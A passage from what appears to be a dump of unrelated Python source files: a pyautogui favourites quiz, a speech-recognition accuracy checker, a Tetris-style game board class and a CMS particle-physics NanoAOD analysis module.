    wb.open("https://www.google.com/search?rlz=1C1GCEA_enUS752US774&biw=1366&bih=657&tbm=isch&sa=1&ei=HNvFW9yoDYTm_QbUyKzgDw&q=addiong&oq=addiong&gs_l=img.3..0i10i24.5226.6666..6852...1.0..0.56.417.8......0....1..gws-wiz-img.......0j0i67j0i10.kcqMNDR26RY#imgrc=LqznGvY1fJpCGM:")
elif subject == "Computer Science":
    # Bug fix: this compared against "Computer science", which .title() can
    # never produce, so the branch was unreachable.
    pg.alert("nice")
    points += 9
    t.sleep(3)
    wb.open("https://www.google.com/search?q=computers&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiom6vv_IreAhUuneAKHXVGA4kQ_AUIDygC&biw=1366&bih=657")
elif subject == "English":
    pg.alert("I like it too.")
    points += 3
    t.sleep(3)
    wb.open("https://www.google.com/search?rlz=1C1GCEA_enUS752US774&biw=1366&bih=657&tbm=isch&sa=1&ei=hNvFW4e3Jafp_QbR26mIDw&q=+book&oq=+book&gs_l=img.3..0i67l3j0j0i67j0l5.3464.3464..3690...0.0..0.51.51.1......0....1..gws-wiz-img.2n6KjdjVyU0")
elif subject == "Science":
    pg.alert("Bill Nye the Science Guy.")
    points += 3
    t.sleep(2)
    wb.open("https://www.youtube.com/watch?v=nDN7M0J3HXc")
elif subject == "Spanish":
    pg.alert("Hola! Como estas?")
    points += 3
    t.sleep(2)
    wb.open("https://www.google.com/search?hl=en&authuser=0&rlz=1C1GCEA_enUS752US774&tbm=isch&q=fiesta&chips=q:fiesta,online_chips:mexican+fiesta&usg=AI4_-kQGU87DySQyv0Aqat3pdqhIpYYwjA&sa=X&ved=0ahUKEwjzjvL6lq7eAhWpTd8KHQ6-CIoQ4lYIKygE&biw=924&bih=639&dpr=1#imgrc=6H_w7py8kTIUHM:")
elif subject == "History":
    pg.alert("In 1492 Christopher Columbus sailed the ocean blue")
    points += 3
    t.sleep(2)
    wb.open("https://www.google.com/search?q=history&rlz=1C1GCEA_enUS752US774&biw=1366&bih=657&tbm=isch&source=lnms&sa=X&ved=0ahUKEwiZ_YDvutHeAhXOVN8KHdEUDEkQ_AUICygC")
else:
    pg.alert("cool")
    points += 1
    t.sleep(2)
    wb.open("https://www.google.com/search?q=school+gif&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjqpI_f_YreAhWsd98KHblYBY8Q_AUIDigB&biw=1366&bih=657#imgrc=kk5pi12VrUoKGM:")
# Question 5: favourite food. As above, the input is title-cased, so the
# comparison values must be title-cased too.
food = pg.prompt("What is your favorite food?").title()
if food == "Pizza":
    pg.alert("Pizza Hut? Dominos?")
    points += 2
    t.sleep(2)
    wb.open("https://cooking.nytimes.com/guides/1-how-to-make-pizza")
elif food == "Chocolate Cake":
    # Bug fix: was "Chocolate cake", which .title() can never produce.
    pg.alert("Now I want one")
    points += 9
    t.sleep(3)
    wb.open("https://www.youtube.com/watch?v=dsJtgmAhFF4")
elif food == "Pasta":
    pg.alert("I like pasta!")
    points += 3
    t.sleep(3)
    wb.open("https://www.google.com/search?q=pasta&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiH_JXSlK7eAhWKT98KHScQASEQ_AUIDigB&biw=924&bih=639")
elif food == "Ice Cream":
    # Bug fix: was "Ice cream", unreachable for the same reason.
    pg.alert("What kind? I like cookie monster.")
    points += 3
    t.sleep(2)
    wb.open("https://barefeetinthekitchen.com/homemade-ice-cream-recipe/")
elif food == "Fruit":
    pg.alert("Refreshing!")
    points += 3
    t.sleep(2)
    wb.open("https://www.google.com/search?q=fruit&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwijobOcla7eAhVyUt8KHfONDGUQ_AUIDigB&biw=924&bih=639#imgrc=ACrdFKwEzni-QM:")
elif food == "Chicken":
    pg.alert("Yum!")
    points += 2
    t.sleep(2)
    wb.open("https://www.google.com/search?q=chicken&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj59fTCutHeAhXLct8KHRV6D88Q_AUIEygB&biw=1366&bih=657")
else:
    pg.alert("YUUMMM")
    points += 1
    t.sleep(2)
    wb.open("https://www.youtube.com/watch?v=11HK5EuYwSk")
# Question 6: favourite movie series, with nested follow-up questions for
# the "Divergent" answer. Finally report the accumulated score.
movie = pg.prompt ("What is your favorite movie series?").title()
if "Divergent" in movie:
    number = pg.prompt("Which movie is your favorite").title()
    if number == "1":
        pg.alert("Nice!")
        # pg.confirm returns the text of the button the user clicked.
        ice_cream = pg.confirm("Which of these flavors is your favorite?", "Choose one", ["chocolate", "vanilla", "cookies and cream"])
        if ice_cream == "cookies and cream":
            pg.alert("YES")
# Final score summary for the whole quiz.
pg.alert ("Your final score is " + str(points))
|
4,392 | 9fc184fe3aa498138138403bef719c59b85b3a80 | import json
def main():
    """Compare Google and PocketSphinx predictions against the ground-truth
    labels in ./src/test/predictions.json and print per-engine accuracy.

    The JSON file is expected to contain parallel lists under the keys
    'label', 'google' and 'pocket_sphinx'.
    """
    with open('./src/test/predictions.json', 'r') as f:
        data = json.load(f)
    labels = data['label']
    total = len(labels)
    # Count exact matches per engine; zip replaces the original
    # range(len(...)) index loop.
    google = sum(1 for pred, label in zip(data['google'], labels) if pred == label)
    sphinx = sum(1 for pred, label in zip(data['pocket_sphinx'], labels) if pred == label)
    print('Google %d out of %d: %.4f' % (google, total, google / total))
    print('Pocket Sphinx %d out of %d: %.4f' % (sphinx, total, sphinx / total))


if __name__ == "__main__":
    main()
4,393 | 2d7431996bc8d1099c08fddc815b4706deb4f023 |
from arcade.sprite_list.sprite_list import SpriteList
import GamePiece as gp
from Errors import *
class GameConfig:
    """Static window and sprite-scaling constants for the game."""
    WINDOW_TITLE = "MyPyTris"
    SCREEN_WIDTH = 450
    SCREEN_HEIGHT = 900
    BLOCK_PX = 45    # on-screen block size, pixels
    SPRITE_PX = 64   # source sprite size, pixels
    # Ratio applied to sprites so a 64px sprite renders as a 45px block.
    BLOCK_SCALE = BLOCK_PX / SPRITE_PX
class GameBoard:
    """ Class to manage blocks on the game board.

    The board is a 2D grid indexed as self.blocks[y][x] (row-major), with
    `height` rows and `width` columns; empty cells hold None.
    """

    def __init__(self, width: int, height: int):
        # 2D list of blocks initialized to empty in the width and height
        # of our game board; indexed [y][x] throughout this class.
        self.width = width
        self.height = height
        self.blocks = [[None for x in range(width)] for y in range(height)]
        self.playerSprites = SpriteList()
        self.groundSprites = SpriteList()

    def draw(self):
        """Draw the player-piece sprites and the settled ground sprites."""
        self.playerSprites.draw()
        self.groundSprites.draw()

    def canMoveBlock(self, x: int, y: int) -> bool:
        """Return True if the cell at column x, row y is empty.

        Bug fix: the original indexed self.blocks[x][y], transposed relative
        to the [y][x] convention used everywhere else in this class.
        """
        return self.blocks[y][x] is None

    def canMoveGamePiece(self, gamePiece:gp.GamePiece, xTo:int, yTo:int) -> bool:
        """Return True if gamePiece can occupy (xTo, yTo): every block stays
        inside the board and lands on a cell that is empty or already
        occupied by the piece itself."""
        for yDiff, row in enumerate(gamePiece.blocks):
            for xDiff, block in enumerate(row):
                if block is None:
                    continue
                newX = xTo + xDiff
                newY = yTo + yDiff
                if newX >= self.width or newX < 0:
                    return False
                if newY < 0 or newY >= self.height:
                    return False
                if self.blocks[newY][newX] is not None \
                        and self.blocks[newY][newX] not in gamePiece.allBlocks():
                    return False
        return True

    def moveGamePiece(self, gamePiece:gp.GamePiece, xTo:int, yTo:int):
        """Move gamePiece to (xTo, yTo) if legal.

        Returns True on success, False if the move is blocked (the original
        implicitly returned None on success).
        """
        if not self.canMoveGamePiece(gamePiece, xTo, yTo):
            return False
        # remove blocks from their current game board cells
        for y, row in enumerate(gamePiece.blocks):
            for x, block in enumerate(row):
                if block is not None:
                    self.blocks[y + gamePiece.y][x + gamePiece.x] = None
        # add blocks in new positions
        for y, row in enumerate(gamePiece.blocks):
            for x, block in enumerate(row):
                if block is not None:
                    blockXDiff = block.x - gamePiece.x
                    blockYDiff = block.y - gamePiece.y
                    newBlockX = xTo + blockXDiff
                    newBlockY = yTo + blockYDiff
                    self.blocks[newBlockY][newBlockX] = block
                    block.moveTo(newBlockX, newBlockY)
        gamePiece.x = xTo
        gamePiece.y = yTo
        return True

    def addBlock(self, aBlock: gp.Block):
        """adds a block to the game board"""
        if self.blocks[aBlock.y][aBlock.x] is not None:
            raise MovementError('game board space not empty')
        self.blocks[aBlock.y][aBlock.x] = aBlock
        self.groundSprites.append(aBlock.sprite)

    def addGamePiece(self, gamePiece:gp.GamePiece):
        """Register every block of gamePiece on the board and add its
        sprites to the player sprite list."""
        for y in range(gamePiece.size):
            for x in range(gamePiece.size):
                block = gamePiece.blocks[y][x]
                if block is None:
                    continue
                self.blocks[block.y][block.x] = block
                self.playerSprites.append(block.sprite)

    def moveBlock(self, aBlock: gp.Block, x: int, y: int):
        """Relocate a single block to cell (x, y); sprites are not updated."""
        self.blocks[aBlock.y][aBlock.x] = None
        self.blocks[y][x] = aBlock

    def removeBlock(self, aBlock: gp.Block):
        """ remove a block from the game board """
        # Bug fix: the original iterated with iter(...) and 2-tuple
        # unpacking, which raises TypeError; enumerate() is required to get
        # (index, value) pairs.
        for y, row in enumerate(self.blocks):
            for x, block in enumerate(row):
                if block is aBlock:
                    self.blocks[y][x] = None
                    self.playerSprites.remove(aBlock.sprite)
                    return
class GameManager:
    """Top-level game driver; currently only builds the board."""
    def __init__(self) -> None:
        pass
    def start(self):
        # Create a standard 10x20 board.
        gameBoard = GameBoard(10, 20)
        # NOTE(review): addGamePiece requires a GamePiece argument but none
        # is passed here, so this call raises TypeError — confirm intent.
        gameBoard.addGamePiece()
4,394 | 1721bba2cae1e330bffeb9df05341df9522ff885 | import ROOT
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module
from TreeProducer import *
from TreeProducerCommon import *
from CorrectionTools.PileupWeightTool import *
from CorrectionTools.BTaggingTool import BTagWeightTool, BTagWPs
from CorrectionTools.MuonSFs import *
from CorrectionTools.ElectronSFs import *
from CorrectionTools.RecoilCorrectionTool import getTTptWeight, getTTPt
from CorrectionTools.DYCorrection import *
import struct
import numpy as np
class LLProducer(Module):
    def __init__(self, name, DataType, filelist, **kwargs):
        """Set up the output tree and, for simulation, all correction tools.

        name     -- name passed to the output TreeProducer
        DataType -- 'data' selects data mode; any other value is treated as MC
        filelist -- list of input sample names; element [0] selects
                    sample-specific corrections below
        kwargs   -- year (default 2017) and tes/ltf/jtf scale factors
                    (default 1.0)
        """
        self.name = name
        self.out = TreeProducer(name)
        self.sample = filelist
        if DataType=='data':
            self.isData = True
            self.isMC = False
        else:
            self.isData = False
            self.isMC = True
        self.year = kwargs.get('year', 2017 )
        self.tes = kwargs.get('tes', 1.0 )
        self.ltf = kwargs.get('ltf', 1.0 )
        self.jtf = kwargs.get('jtf', 1.0 )
        year = self.year
        self.filter = getMETFilters(year,self.isData)
        if not self.isData:
            # Scale factors and b-tag weights are only defined for MC.
            self.muSFs = MuonSFs(year=year)
            self.elSFs = ElectronSFs(year=year)
            self.puTool = PileupWeightTool(year =year)
            # DeepCSV loose working point, central/up/down variations,
            # separately for AK8 and AK4 jets.
            self.btagToolAK8_deep = BTagWeightTool('DeepCSV','AK8','loose',sigma='central',channel='ll',year=year)
            self.btagToolAK8_deep_up = BTagWeightTool('DeepCSV','AK8','loose',sigma='up',channel='ll',year=year)
            self.btagToolAK8_deep_down = BTagWeightTool('DeepCSV','AK8','loose',sigma='down',channel='ll',year=year)
            self.btagToolAK4_deep = BTagWeightTool('DeepCSV','AK4','loose',sigma='central',channel='ll',year=year)
            self.btagToolAK4_deep_up = BTagWeightTool('DeepCSV','AK4','loose',sigma='up',channel='ll',year=year)
            self.btagToolAK4_deep_down = BTagWeightTool('DeepCSV','AK4','loose',sigma='down',channel='ll',year=year)
        # Drell-Yan / W+jets corrections keyed off the sample name.
        if 'DYJetsToLL' in self.sample[0]:
            self.DYCorr = DYCorrection('DYJetsToLL')
        elif 'ZJetsToNuNu' in self.sample[0]:
            self.DYCorr = DYCorrection('ZJetsToNuNu')
        elif 'WJetsToLNu' in self.sample[0]:
            self.DYCorr = DYCorrection('WJetsToLNu')
        # Enable JEC variations for selected signal/background samples.
        self.runJEC = False
        JEC_samples = ['Zprime','WWTo','WZTo','ZZTo','GluGluHToBB','ZH_HToBB','Wplus','Wminus']
        for JEC_sample in JEC_samples:
            # NOTE(review): find(...)>0 misses a match at index 0 (start of
            # the string); >=0 (or `in`) may be intended — confirm.
            if self.sample[0].find(JEC_sample)>0:
                self.runJEC = True
    def beginJob(self):
        """Hook called once before the event loop; nothing to do here."""
        pass
    def endJob(self):
        """Write the b-tag efficiency maps (MC only) and close the output file."""
        if not self.isData:
            self.btagToolAK8_deep.setDirectory(self.out.outputfile,'AK8btag_deep')
            self.btagToolAK4_deep.setDirectory(self.out.outputfile,'AK4btag_deep')
        self.out.outputfile.Write()
        self.out.outputfile.Close()
    def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):
        """Hook called at the start of each input file; unused."""
        pass
    def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):
        """Hook called at the end of each input file; unused."""
        pass
    def fillBranches(self,event):
        """Copy the per-event quantities computed in analyze() (stored on
        self) plus a few raw event fields into the output tree branches,
        then fill the tree. Must be called after analyze() has populated
        the corresponding attributes for this event."""
        # --- dataset / era flags and event identifiers ---
        self.out.isMC[0] = self.isMC
        self.out.is2016[0] = self.is2016
        self.out.is2017[0] = self.is2017
        self.out.is2018[0] = self.is2018
        self.out.EventNumber[0] = event.event
        self.out.LumiNumber[0] = event.luminosityBlock
        self.out.RunNumber[0] = event.run
        # --- event weights and correction factors ---
        self.out.EventWeight[0] = self.EventWeight
        self.out.TopWeight[0] = self.TopWeight
        self.out.BTagAK8Weight[0] = self.BTagAK8Weight
        self.out.BTagAK4Weight[0] = self.BTagAK4Weight
        self.out.BTagAK8Weight_deep[0] = self.BTagAK8Weight_deep
        self.out.BTagAK8Weight_deep_up[0] = self.BTagAK8Weight_deep_up
        self.out.BTagAK8Weight_deep_down[0] = self.BTagAK8Weight_deep_down
        self.out.BTagAK4Weight_deep[0] = self.BTagAK4Weight_deep
        self.out.BTagAK4Weight_deep_up[0] = self.BTagAK4Weight_deep_up
        self.out.BTagAK4Weight_deep_down[0] = self.BTagAK4Weight_deep_down
        self.out.BBTagWeight[0] = self.BBTagWeight
        self.out.GenWeight[0] = self.GenWeight
        self.out.PUWeight[0] = self.PUWeight
        self.out.LeptonWeight[0] = self.LeptonWeight
        self.out.LeptonWeightUp[0] = self.LeptonWeightUp
        self.out.LeptonWeightDown[0] = self.LeptonWeightDown
        self.out.TriggerWeight[0] = self.TriggerWeight
        self.out.TriggerWeightUp[0] = self.TriggerWeightUp
        self.out.TriggerWeightDown[0] = self.TriggerWeightDown
        self.out.QCDNLO_Corr[0] = self.QCDNLO_Corr
        self.out.QCDNNLO_Corr[0] = self.QCDNNLO_Corr
        self.out.EWKNLO_Corr[0] = self.EWKNLO_Corr
        # --- event category flags ---
        self.out.isZtoNN[0] = self.isZtoNN
        self.out.isZtoEE[0] = self.isZtoEE
        self.out.isZtoMM[0] = self.isZtoMM
        self.out.isTtoEM[0] = self.isTtoEM
        self.out.isBoosted4B[0] = self.isBoosted4B
        self.out.isHtobb[0] = self.isHtobb
        self.out.isHtobb_ml[0] = self.isHtobb_ml
        self.out.isMaxBTag_loose[0] = self.isMaxBTag_loose
        self.out.isMaxBTag_medium[0] = self.isMaxBTag_medium
        self.out.isMaxBTag_tight[0] = self.isMaxBTag_tight
        self.out.isVBF[0] = self.isVBF
        # --- object multiplicities and global event topology ---
        self.out.nPV[0] = event.PV_npvsGood
        self.out.nTaus[0] = self.nTaus
        self.out.nElectrons[0] = self.nElectrons
        self.out.nMuons[0] = self.nMuons
        self.out.nJets[0] = self.nJetsNoFatJet
        self.out.nFatJets[0] = self.nFatJets
        self.out.DPhi[0] = self.DPhi
        self.out.DEta[0] = self.VHDEta
        self.out.MinDPhi[0] = self.MinJetMetDPhi
        self.out.MaxBTag[0] = self.MaxJetNoFatJetBTag
        self.out.BtagDeepB[0] = self.BtagDeepB
        # --- fat-jet deep-tagger discriminants ---
        self.out.DeepTagMD_H4qvsQCD[0] = self.DeepTagMD_H4qvsQCD
        self.out.DeepTagMD_HbbvsQCD[0] = self.DeepTagMD_HbbvsQCD
        self.out.DeepTagMD_ZHbbvsQCD[0] = self.DeepTagMD_ZHbbvsQCD
        self.out.DeepTagMD_ZbbvsQCD[0] = self.DeepTagMD_ZbbvsQCD
        self.out.DeepTagMD_bbvsLight[0] = self.DeepTagMD_bbvsLight
        self.out.DeepTagMD_WvsQCD[0] = self.DeepTagMD_WvsQCD
        self.out.DeepTagMD_ZvsQCD[0] = self.DeepTagMD_ZvsQCD
        # --- leading and sub-leading muon kinematics / ID ---
        self.out.Mu1_pt[0] = self.Mu1_pt
        self.out.Mu1_eta[0] = self.Mu1_eta
        self.out.Mu1_phi[0] = self.Mu1_phi
        self.out.Mu1_mass[0] = self.Mu1_mass
        self.out.Mu1_pfIsoId[0] = self.Mu1_pfIsoId
        self.out.Mu1_relIso[0] = self.Mu1_relIso
        self.out.Mu1_highPtId[0] = self.Mu1_highPtId
        self.out.Mu2_pt[0] = self.Mu2_pt
        self.out.Mu2_eta[0] = self.Mu2_eta
        self.out.Mu2_phi[0] = self.Mu2_phi
        self.out.Mu2_mass[0] = self.Mu2_mass
        self.out.Mu2_pfIsoId[0] = self.Mu2_pfIsoId
        self.out.Mu2_relIso[0] = self.Mu2_relIso
        self.out.Mu2_highPtId[0] = self.Mu2_highPtId
        # --- leading and sub-leading electron kinematics ---
        self.out.Ele1_pt[0] = self.Ele1_pt
        self.out.Ele1_eta[0] = self.Ele1_eta
        self.out.Ele1_phi[0] = self.Ele1_phi
        self.out.Ele1_mass[0] = self.Ele1_mass
        self.out.Ele2_pt[0] = self.Ele2_pt
        self.out.Ele2_eta[0] = self.Ele2_eta
        self.out.Ele2_phi[0] = self.Ele2_phi
        self.out.Ele2_mass[0] = self.Ele2_mass
        self.out.Ele_HEM15_16[0] = self.Ele_HEM15_16
        # --- VBF jet pair kinematics ---
        self.out.Jet1_VBF_pt[0] = self.Jet1_VBF_pt
        self.out.Jet1_VBF_eta[0] = self.Jet1_VBF_eta
        self.out.Jet1_VBF_phi[0] = self.Jet1_VBF_phi
        self.out.Jet1_VBF_mass[0] = self.Jet1_VBF_mass
        self.out.Jet2_VBF_pt[0] = self.Jet2_VBF_pt
        self.out.Jet2_VBF_eta[0] = self.Jet2_VBF_eta
        self.out.Jet2_VBF_phi[0] = self.Jet2_VBF_phi
        self.out.Jet2_VBF_mass[0] = self.Jet2_VBF_mass
        self.out.dijet_VBF_mass[0] = self.dijet_VBF_mass
        self.out.deltaR_VBF[0] = self.deltaR_VBF
        self.out.deltaR_HVBFjet1[0] = self.deltaR_HVBFjet1
        self.out.deltaR_HVBFjet2[0] = self.deltaR_HVBFjet2
        # --- missing energy and generator-level weights ---
        self.out.MET[0] = event.PuppiMET_pt
        self.out.MET_chs[0] = event.MET_pt
        self.out.HT_HEM15_16[0] = self.HT_HEM15_16
        # LHEScaleWeight / LHEPdfWeight are array branches (no [0] index).
        self.out.LHEScaleWeight = self.LHEScaleWeight
        self.out.LHEPdfWeight = self.LHEPdfWeight
        self.out.LHEWeight_originalXWGTUP[0]= self.LHEWeight_originalXWGTUP
        self.out.PrefireWeight[0] = self.PrefireWeight
        self.out.PrefireWeightUp[0] = self.PrefireWeightUp
        self.out.PrefireWeightDown[0] = self.PrefireWeightDown
        self.out.HT[0] = self.HT
        # --- Higgs candidate (fat jet) kinematics and substructure ---
        self.out.H_pt[0] = self.H_pt
        self.out.H_eta[0] = self.H_eta
        self.out.H_phi[0] = self.H_phi
        self.out.H_mass[0] = self.H_mass
        self.out.H_M[0] = self.H_M
        self.out.H_tau21[0] = self.H_tau21
        self.out.H_tau41[0] = self.H_tau41
        self.out.H_tau42[0] = self.H_tau42
        self.out.H_tau31[0] = self.H_tau31
        self.out.H_tau32[0] = self.H_tau32
        self.out.H_ddt[0] = self.H_ddt
        self.out.H_csv1[0] = self.H_csv1
        self.out.H_csv2[0] = self.H_csv2
        self.out.H_deepcsv1[0] = self.H_deepcsv1
        self.out.H_deepcsv2[0] = self.H_deepcsv2
        self.out.H_dbt[0] = self.H_dbt
        self.out.H_hadronflavour[0] = self.H_hadronflavour
        self.out.H_partonflavour[0] = self.H_partonflavour
        self.out.H_chf[0] = self.H_chf
        self.out.H_nhf[0] = self.H_nhf
        # --- vector boson candidate and combined system ---
        self.out.V_pt[0] = self.V_pt
        self.out.V_eta[0] = self.V_eta
        self.out.V_phi[0] = self.V_phi
        self.out.V_mass[0] = self.V_mass
        self.out.VH_deltaR[0] = self.VH_deltaR
        self.out.X_pt[0] = self.X_pt
        self.out.X_eta[0] = self.X_eta
        self.out.X_phi[0] = self.X_phi
        self.out.X_mass[0] = self.X_mass
        self.out.X_mass_chs[0] = self.X_mass_chs
        # --- JES/JER/JMS/JMR systematic variations of the masses ---
        self.out.X_mass_nom[0] = self.X_mass_nom
        self.out.X_mass_jesUp[0] = self.X_mass_jesUp
        self.out.X_mass_jesDown[0] = self.X_mass_jesDown
        self.out.X_mass_jerUp[0] = self.X_mass_jerUp
        self.out.X_mass_jerDown[0] = self.X_mass_jerDown
        self.out.X_mass_MET_nom[0] = self.X_mass_MET_nom
        self.out.X_mass_MET_jesUp[0] = self.X_mass_MET_jesUp
        self.out.X_mass_MET_jesDown[0] = self.X_mass_MET_jesDown
        self.out.X_mass_MET_jerUp[0] = self.X_mass_MET_jerUp
        self.out.X_mass_MET_jerDown[0] = self.X_mass_MET_jerDown
        self.out.H_mass_nom[0] = self.H_mass_nom
        self.out.H_mass_jmsUp[0] = self.H_mass_jmsUp
        self.out.H_mass_jmsDown[0] = self.H_mass_jmsDown
        self.out.H_mass_jmrUp[0] = self.H_mass_jmrUp
        self.out.H_mass_jmrDown[0] = self.H_mass_jmrDown
        self.out.tree.Fill()
def analyze(self, event):
"""process event, return True (go to next module) or False (fail, go to next event)"""
##### set variables ####
self.nElectrons = 0
self.nMuons = 0
self.nTaus = 0
self.nFatJets = 0
self.EventWeight = 1.
self.TopWeight = 1.
self.BTagAK8Weight = 1.
self.BTagAK4Weight = 1.
self.BTagAK8Weight_deep = 1.
self.BTagAK8Weight_deep_up = 1.
self.BTagAK8Weight_deep_down = 1.
self.BTagAK4Weight_deep = 1.
self.BTagAK4Weight_deep_up = 1.
self.BTagAK4Weight_deep_down = 1.
self.BBTagWeight = 1.
self.GenWeight = 1.
self.PUWeight = 1.
self.LeptonWeight = 1.
self.LeptonWeightUp = 1.
self.LeptonWeightDown = 1.
self.TriggerWeight = 1.
self.TriggerWeightUp = 1.
self.TriggerWeightDown = 1.
self.isZtoMM = False
self.isZtoEE = False
self.isZtoNN = False
self.isTtoEM = False
self.isBoosted4B = False
self.isHtobb = False
self.isHtobb_ml = False
self.isMaxBTag_loose = False
self.isMaxBTag_medium = False
self.isMaxBTag_tight = False
self.isVBF = False
self.is2016 = False
self.is2017 = False
self.is2018 = False
self.nTaus = 0
self.nJetsNoFatJet = 0
self.H_partonflavour = -1.
self.H_hadronflavour = -1.
self.DPhi = -1.
self.VHDEta = -1.
self.MinJetMetDPhi = 10.
self.MaxJetNoFatJetBTag = -1.
self.BtagDeepB = -1.
self.DeepTagMD_H4qvsQCD = -1.
self.DeepTagMD_HbbvsQCD = -1.
self.DeepTagMD_ZHbbvsQCD = -1.
self.DeepTagMD_ZbbvsQCD = -1.
self.DeepTagMD_bbvsLight = -1.
self.DeepTagMD_WvsQCD = -1.
self.DeepTagMD_ZvsQCD = -1.
self.Mu1_pt = -1.
self.Mu1_eta = -1.
self.Mu1_phi = -1.
self.Mu1_mass = -1.
self.Mu1_pfIsoId = -1.
self.Mu1_relIso = -1.
self.Mu1_highPtId = -1.
self.Mu2_pt = -1.
self.Mu2_eta = -1.
self.Mu2_phi = -1.
self.Mu2_mass = -1.
self.Mu2_pfIsoId = -1.
self.Mu2_relIso = -1.
self.Mu2_highPtId = -1.
self.Ele1_pt = -1.
self.Ele1_eta = -1.
self.Ele1_phi = -1.
self.Ele1_mass = -1.
self.Ele2_pt = -1.
self.Ele2_eta = -1.
self.Ele2_phi = -1.
self.Ele2_mass = -1.
self.Ele_HEM15_16 = -1.
self.HT_HEM15_16 = -1.
self.HT = 0.
self.LHEScaleWeight = -1.
self.LHEPdfWeight = -1.
self.LHEWeight_originalXWGTUP = -1.
self.PrefireWeight = 1.
self.PrefireWeightUp = 1.
self.PrefireWeightDown = 1.
self.QCDNLO_Corr = 1.
self.QCDNNLO_Corr = 1.
self.EWKNLO_Corr = 1.
self.Jet1_VBF_pt = -1.
self.Jet1_VBF_eta = -1.
self.Jet1_VBF_phi = -1.
self.Jet1_VBF_mass = -1.
self.Jet2_VBF_pt = -1.
self.Jet2_VBF_eta = -1.
self.Jet2_VBF_phi = -1.
self.Jet2_VBF_mass = -1.
self.dijet_VBF_mass = -1.
self.deltaR_VBF = -1.
self.deltaR_HVBFjet1 = -1.
self.deltaR_HVBFjet2 = -1.
self.H_pt = -1.
self.H_eta = -1.
self.H_phi = -1.
self.H_mass = -1.
self.H_M = -1.
self.H_tau21 = -1.
self.H_tau41 = -1.
self.H_tau42 = -1.
self.H_tau31 = -1.
self.H_tau32 = -1.
self.H_ddt = -1.
self.H_csv1 = -1.
self.H_csv2 = -1.
self.H_deepcsv1 = -1.
self.H_deepcsv2 = -1.
self.H_dbt = -1.
self.H_chf = -1.
self.H_nhf = -1.
self.V_pt = -1.
self.V_eta = -1.
self.V_phi = -1.
self.V_mass = -1.
self.VH_deltaR = -1.
self.X_pt = -1.
self.X_eta = -1.
self.X_phi = -1.
self.X_mass = -1.
self.X_mass_chs = -1.
self.X_mass_nom = -1.
self.X_mass_jesUp = -1.
self.X_mass_jesDown = -1.
self.X_mass_jerUp = -1.
self.X_mass_jerDown = -1.
self.X_mass_MET_nom = -1.
self.X_mass_MET_jesUp = -1.
self.X_mass_MET_jesDown = -1.
self.X_mass_MET_jerUp = -1.
self.X_mass_MET_jerDown = -1.
self.H_mass_nom = -1.
self.H_mass_jmsUp = -1.
self.H_mass_jmsDown = -1.
self.H_mass_jmrUp = -1.
self.H_mass_jmrDown = -1.
eecutflow_list = []
mmcutflow_list = []
nncutflow_list = []
idx_electrons = []
idx_loose_electrons = []
idx_muons = []
idx_loose_muons = []
idx_fatjet = []
idx_jet = []
idx_jet_vbf = []
electrons_tlv_list = []
loose_electrons_tlv_list = []
muons_tlv_list = []
loose_muons_tlv_list = []
fatjet_tlv_list = []
jet_tlv_list = []
jet_tlv_list_vbf = []
fatjet_tau21_list = []
fatjet_tau41_list = []
fatjet_tau42_list = []
fatjet_tau31_list = []
fatjet_tau32_list = []
V = ROOT.TLorentzVector()
H = ROOT.TLorentzVector()
X = ROOT.TLorentzVector()
V_chs = ROOT.TLorentzVector()
######### cuts #########
elec1_pt_cut = 55.
elec2_pt_cut = 20.
elec_pt_cut = 10.
elec_eta_cut = 2.5
muon1_pt_cut = 55.
muon2_pt_cut = 20.
muon_pt_cut = 10.
muon_eta_cut = 2.4
tau_pt_cut = 18.
tau_eta_cut = 2.3
ak4_pt_cut = 30.
ak4_eta_cut = 2.4
fatjet_pt_cut = 200.
fatjet_eta_cut = 2.4
met_pt_cut = 250.
v_pt_cut = 200.
tau21_lowercut = 0.35
tau21_uppercut = 0.75
j_mass_lowercut = 30.
j_mass_uppercut = 250.
v_mass_lowercut = 65.
v_mass_intercut = 85.
v_mass_uppercut = 105.
h_mass_lowercut = 105.
h_mass_uppercut = 135.
x_mass_lowercut = 750.
xt_mass_lowercut = 650.
xjj_mass_lowercut = 950.
#### flag for year #######
if self.year == 2016:
self.is2016 = True
elif self.year == 2017:
self.is2017 = True
elif self.year == 2018:
self.is2018 = True
######### triggers #########
if self.year == 2016:
try:
trigger_SingleMu = any([event.HLT_Mu50,
event.HLT_TkMu50])
except:
trigger_SingleMu = event.HLT_Mu50
trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT
trigger_SingleIsoEle = event.HLT_Ele27_WPTight_Gsf
trigger_SinglePhoton = event.HLT_Photon175
trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,
event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,
event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])
trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight,
event.HLT_PFMET120_PFMHT120_IDTight])
trigger_MET = any([event.HLT_PFMET170_NotCleaned,
event.HLT_PFMET170_HBHECleaned])
elif self.year == 2017:
try:
trigger_SingleMu = any([event.HLT_Mu50,
event.HLT_TkMu100,
event.HLT_OldMu100])
except:
trigger_SingleMu = event.HLT_Mu50
try:
trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT
except:
trigger_SingleEle = None
trigger_SingleIsoEle = event.HLT_Ele35_WPTight_Gsf
trigger_SinglePhoton = event.HLT_Photon200
try:
trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,
event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,
event.HLT_PFMETNoMu130_PFMHTNoMu130_IDTight,
event.HLT_PFMETNoMu140_PFMHTNoMu140_IDTight,
event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])
except:
